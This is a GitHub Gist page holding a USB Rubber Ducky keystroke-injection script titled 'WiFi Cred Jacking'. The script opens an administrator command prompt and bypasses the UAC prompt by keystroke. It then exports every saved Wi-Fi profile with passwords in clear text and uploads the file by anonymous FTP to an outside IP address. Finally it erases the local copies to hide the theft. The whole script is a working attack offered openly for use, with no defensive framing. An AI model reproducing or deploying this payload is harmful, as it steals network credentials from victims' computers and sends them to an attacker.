Created
September 1, 2013 11:21
-
-
Save j105rob/6403843 to your computer and use it in GitHub Desktop.
WiFi Cred Jacking w/ Rubber Ducky
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
REM #### win 7 bits upload wlan keys | |
DELAY 1000 | |
ESCAPE | |
CONTROL ESCAPE | |
DELAY 400 | |
STRING cmd | |
DELAY 400 | |
CTRL-SHIFT ENTER | |
DELAY 400 | |
ALT y | |
DELAY 400 | |
STRING netsh wlan export profile folder=%USERPROFILE%\ key=clear | |
ENTER | |
DELAY 200 | |
STRING copy /b /Y %USERPROFILE%\*.xml %USERPROFILE%\wipass.xml | |
ENTER | |
STRING echo put %USERPROFILE%\wipass.xml uploads/wipass.xml|ftp -A 192.168.100.115 | |
ENTER | |
DELAY 2200 | |
STRING quit | |
ENTER | |
STRING erase /Q %USERPROFILE%\*.xml | |
ENTER | |
DELAY 200 | |
STRING exit | |
ENTER |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment